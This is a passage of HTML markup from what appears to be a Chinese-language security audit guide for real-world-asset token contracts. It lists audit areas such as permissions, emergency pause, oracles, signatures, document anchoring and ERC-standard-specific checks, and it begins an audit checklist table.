serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">强制操作</span></span></p></li></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5、资产运营与治理审计</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码部署后的管理权限是主要攻击面，需防止权限滥用。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">角色与权限管理</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">紧急熔断(Emergency Pause)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">事件日志完整性(Event Logging)</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">6、交易与链下集成审计</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA 往往涉及复杂的交易结构和外部数据依赖。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">预言机与估值(Oracle &amp; Valuation)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">货银对付(DVP / Swaps)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">签名验证(Signatures)</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">批量操作(Batch Operations)</span></span></p></li><ul class="list-paddingleft-1"></ul></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">7、文档与数据锚定审计</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">链上代币是链下资产的影子，影子不能脱离本体。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文档不可篡改性</span></span></p></li><ul class="list-paddingleft-1"></ul><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">资产标识符</span></span></p></li></ul><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">8、补充：特定协议族深度审计要点</span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">针对不同 RWA 标准的特性化检查。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">A. 针对 ERC-1400 / ERC-3643 的证券类型</span></span></p><ol class="list-paddingleft-1"></ol><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">B. 针对 ERC-6065 / ERC-1155 的房地产类型</span></span></p><ol class="list-paddingleft-1"></ol><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">C. 针对 ERC-4519 的 IoT/实物绑定类型</span></span></p><ol class="list-paddingleft-1"></ol><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">D. 针对 ERC-6960 的双层/结构化资产类型</span></span></p><ol class="list-paddingleft-1"></ol><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">E. 针对通用合规接口 ERC-7943 (uRWA) 类</span></span></p><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">II. 综合审计检查清单表格</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾安全团队采用了自动化扫描，AI 工具审计辅助以及人工深度复核相结合的方法，对以下维度进行了全面审计：</span></span></p><table><tbody><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">序号(NO.)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审计大类(Audit Class)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">审计子类(Audit Subclass)</span></span></p></td></tr><tr><td rowspan="10"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1</span></span></p></td><td rowspan="10"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">功能合规性审计(Functionality Compliance Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">基础功能完备性审计(Basic Functionality Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">全局暂停/恢复功能审计(Global Pause/Resume Functionality Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">受控铸造/销毁功能审计(Controlled Mint/Burn Functionality)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">账户级冻结功能审计(Account-Level Freeze Functionality Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">强制转移/没收功能审计(Forced Transfer/Wipe Functionality Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">黑名单管理功能审计(Blacklist Management Functionality Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">白名单/身份注册表管理审计(Whitelist/Identity Registry Management Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">分区/份额管理逻辑审计(Partition/Tranche Logic Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文档/元数据锚定审计(Document/Metadata Anchoring Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">可升级性功能审计(Upgradability Functionality Audit)</span></span></p></td></tr><tr><td rowspan="2"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2</span></span></p></td><td rowspan="2"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">访问控制体系审计(Access Control System)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">基于角色的权限控制审计(Role-Based Access Control Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">多重签名机制审计(Multi-signature Mechanism Audit)</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">溢出漏洞审计(Overflow Audit)</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">-</span></span></p></td></tr><tr><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4</span></span></p></td><td><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: 